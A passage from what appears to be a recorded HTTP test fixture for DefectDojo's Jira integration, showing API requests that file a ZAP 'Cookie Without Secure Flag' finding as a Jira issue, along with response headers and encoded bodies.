2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - b3f3e3addc8bd5b7 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:17 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - b4bd784e-2ee2-436e-a2a1-ed0fecdb1587 + x-envoy-upstream-service-time: + - '76' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Zap1: Cookie Without + Secure Flag", "description": "\n\n\n\n\n\n*Title*: [Zap1: Cookie Without Secure + Flag|http://localhost:8080/finding/389]\n\n*Defect Dojo link:* http://localhost:8080/finding/389\n\n*Severity:* + Low \n\n*CWE:* Unknown\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [weekly engagement|http://localhost:8080/engagement/3] + / [ZAP Scan|http://localhost:8080/test/113]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n\n*Mitigation*:\nWhenever a cookie contains + sensitive information or is a session token, then it should always be passed + using an encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n\n*Defect + Dojo ID:* 389\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1673' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10615","key":"NTEST-463","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10615"}' + headers: + ATL-TraceId: + - 03b530f8b6b59f13 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:17 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - b4702b40-daf0-42e2-baaa-f07ceaf894f6 + x-envoy-upstream-service-time: + - '326' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-463 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - 8cc23f0ad8f92676 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:17 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - baf2fbae-2183-4f57-bdf0-f5ea1ea4fb1b + x-envoy-upstream-service-time: + - '161' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10615 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - 0b691838e80c52a0 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:18 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 8c5adf3e-32d1-4037-80ff-cb6bccb90cf3 + x-envoy-upstream-service-time: + - '167' + status: + code: 200 + message: OK +- request: + body: '{"issueKeys": ["10615"], "ignoreEpics": true}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '45' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: PUT + uri: https://defectdojo.atlassian.net/rest/greenhopper/1.0/epics/10614/add + response: + body: + string: '' + headers: + ATL-TraceId: + - 4c0b376d6f51123f + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:18 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 89c0d16e-b628-4e26-bd06-d88fe46839ea + x-envoy-upstream-service-time: + - '274' + status: + code: 204 + message: No Content +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPzU7DMBCE32WvJOna+WntG4IDIFSQkp4QQk6yFkGOHSUOUlX13bFFRbntzH6z + oz1BqxY6zAYkfHo/LXKz6UlT53v35TLljVqWQdnMkocEvmleBmcDzBBZhhmm9f72tX54aa7b/Tq2 + YQL5FqEEE3xPoKfJuONI1jfHicKBO+PWPoTadTD9bwRkDJTFxbxXPoIcOUuRp7xqGJN8K/MiQ8Qb + DHDILzSH3mYYr2yeIms4yqKUTGQsF39sNz5a7QJYVGW51UxromInhFZF1KTYllfljgfBy05U4l+B + N7HhaZgVxHe0Wo1/dp2K9gnMZQKyH4cazucfAAAA//8DABzY+glaAQAA + headers: + ATL-TraceId: + - 74c6ababf6f2f3ef + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:19 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - f9f826e7-1179-401f-ad49-b4aaaabc853d + x-envoy-upstream-service-time: + - '28' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 44febe6f48fdbc0b + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:19 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 0c133041-d47b-4503-beb7-fcc64ddefc74 + x-envoy-upstream-service-time: + - '55' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: 